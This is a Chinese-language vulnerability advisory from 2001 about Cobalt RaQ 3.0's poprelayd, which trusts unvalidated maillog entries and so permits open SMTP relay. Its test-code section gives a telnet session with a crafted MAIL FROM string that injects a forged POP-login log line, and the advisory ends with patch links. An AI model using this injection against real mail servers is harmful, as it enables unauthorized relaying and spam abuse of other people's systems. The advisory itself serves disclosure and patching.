Cobalt Raq3 PopRelayD可被任意SMTP RELAY发布时间:2001-07-10 更新时间:2001-07-10 严重程度:高 威胁程度:其它 错误类型:访问验证错误 利用方式:服务器模式 受影响系统 Cobalt RaQ 3.0详细描述 poprelayd 是为合法pop登陆解析/var/log/maillog的脚本,基于 登陆的客户端,允许用户登陆POP3服务也可以从这个地址发送EMAIL。 poprelayd对/var/log/maillog文件输出不验证,这可能导致用户 通过SENDMAIL建立任意字符串记录到文件中,因此允许远程用户 通过SMTP服务来relay邮件。 测试代码 telnet dumbcobalt 25 Trying 123.123.123.123... Connected to dumbcobalt ... ehlo dumbcobalt ... mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org" 553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org"...Domain name required 解决方案 下载补丁: Cobalt RaQ 3.0: Sun RPM RaQ3 poprelayd-2.0-4.src.rpm ftp://ftp.cobaltnet.com/pub/experimental/SRPMS/poprelayd-2.0-4.src.rpm Sun RPM RaQ3 poprelayd-2.0-4.noarch.rpm ftp://ftp.cobaltnet.com/pub/experimental/RPMS/poprelayd-2.0-4.noarch.rpm 相关信息 |
